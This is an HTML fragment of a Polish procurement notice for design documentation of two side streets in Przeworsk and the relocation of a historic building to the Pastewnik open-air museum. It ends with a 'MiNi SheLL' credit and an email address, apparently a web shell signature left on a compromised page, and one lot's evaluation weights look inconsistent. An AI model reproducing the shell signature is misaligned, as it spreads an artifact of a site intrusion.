<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej dla ulicy bocznej Misiągiewicza i bocznej Zygmuntowskiej w Przeworsku ( długość ok. 500 m).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 150.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie dokumentacji projektowej wraz z inwentaryzacją i rewitalizacją  zabytkowego budynku zlokalizowanego przy  ul.Tkackiej  oraz jego przeniesieniem na teren skansenu Pastewnik w Przeworsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej wraz z inwentaryzacją i rewitalizacją  zabytkowego budynku zlokalizowanego przy  ul.Tkackiej  oraz jego przeniesieniem na teren skansenu Pastewnik w Przeworsku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 150.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 20</li>
<li>2. termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com